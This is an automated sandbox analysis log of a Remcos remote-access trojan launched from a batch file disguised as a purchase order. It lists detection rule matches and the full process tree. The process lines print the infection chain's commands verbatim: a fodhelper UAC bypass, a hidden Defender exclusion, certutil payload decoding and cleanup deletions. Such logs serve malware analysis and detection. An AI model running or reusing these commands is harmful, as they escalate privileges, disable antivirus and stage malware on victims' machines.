Source: C:\Users\Public\kn.exe Code function: String function: 00007FF67DE3D1C8 appears 41 times
Source: C:\Users\Public\kn.exe Code function: String function: 00007FF67DEF7BAC appears 34 times
Source: C:\Users\Public\kn.exe Code function: String function: 00007FF67DE6BC9C appears 280 times
Source: C:\Users\Public\kn.exe Code function: String function: 00007FF67DF3F11C appears 37 times
Source: C:\Users\Public\kn.exe Code function: String function: 00007FF67DF3F1B8 appears 183 times
Source: C:\Users\Public\kn.exe Code function: String function: 00007FF67DEF7D70 appears 35 times
Source: C:\Users\Public\ger.exe Code function: String function: 00007FF65588D3D0 appears 56 times
Source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001C.00000002.4524424593.000000001BA5B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000026.00000002.2516862809.000000001B02B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: sppsvc.pif PID: 5228, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: Kpeyvroh.PIF PID: 1528, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.rans.bank.troj.spyw.expl.evad.winCMD@68/35@11/6
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC32B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError, 4_2_00007FF789BC32B0
Source: C:\Users\Public\ger.exe Code function: 14_2_00007FF655883F5C GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle, 14_2_00007FF655883F5C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF1826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle, 25_2_00007FF67DF1826C
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA07952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 28_2_1BA07952
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_21077952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 36_2_21077952
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BEFB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z, 4_2_00007FF789BEFB54
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1B9FF8FD CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle, 28_2_1B9FF8FD
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE77EC0 CoCreateInstance,#357,#207,LocalFree,LocalFree, 25_2_00007FF67DE77EC0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF43148 FindResourceExW,LoadResource, 25_2_00007FF67DF43148
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA0AB0D OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,QueryServiceStatus,StartServiceW, 28_2_1BA0AB0D
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe
Source: C:\Users\Public\xkn.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_03
Source: C:\Users\Public\Libraries\sppsvc.pif Mutant created: \Sessions\1\BaseNamedObjects\Rmc-3A6IQD
Source: C:\Users\Public\xkn.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3ru4bzt.u0w.ps1
Source: C:\Users\Public\Libraries\sppsvc.pif Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\sppsvc.pif Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\alpha.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SystemSettings.exe")
Source: C:\Users\Public\alpha.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SystemSettings.exe")
Source: C:\Users\Public\xkn.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\extrac32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1956,i,11964562257046214624,14274192803590327640,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\Public\xkn.exe Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
Source: C:\Users\Public\xkn.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: unknown Process created: C:\Windows\System32\SystemSettingsAdminFlows.exe "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\Libraries\sppsvc.pif C:\Users\Public\Libraries\sppsvc.pif
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\ger.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
Source: C:\Users\Public\Libraries\sppsvc.pif Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Kpeyvroh.PIF
Source: unknown Process created: C:\Users\Public\Libraries\Kpeyvroh.PIF "C:\Users\Public\Libraries\Kpeyvroh.PIF"
Source: unknown Process created: C:\Users\Public\Libraries\Kpeyvroh.PIF "C:\Users\Public\Libraries\Kpeyvroh.PIF"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\Libraries\sppsvc.pif C:\Users\Public\Libraries\sppsvc.pif
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\ger.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
Source: C:\Users\Public\xkn.exe Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
Source: C:\Users\Public\xkn.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1956,i,11964562257046214624,14274192803590327640,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
Source: C:\Users\Public\Libraries\sppsvc.pif Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Kpeyvroh.PIF
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: textshaping.dll
Source: C:\Users\Public\xkn.exe Section loaded: atl.dll
Source: C:\Users\Public\xkn.exe Section loaded: mscoree.dll
Source: C:\Users\Public\xkn.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Public\xkn.exe Section loaded: version.dll
Source: C:\Users\Public\xkn.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\xkn.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\xkn.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\xkn.exe Section loaded: cryptsp.dll
Source: C:\Users\Public\xkn.exe Section loaded: rsaenh.dll
Source: C:\Users\Public\xkn.exe Section loaded: cryptbase.dll
Source: C:\Users\Public\xkn.exe Section loaded: amsi.dll
Source: C:\Users\Public\xkn.exe Section loaded: userenv.dll
Source: C:\Users\Public\xkn.exe Section loaded: profapi.dll
Source: C:\Users\Public\xkn.exe Section loaded: windows.storage.dll
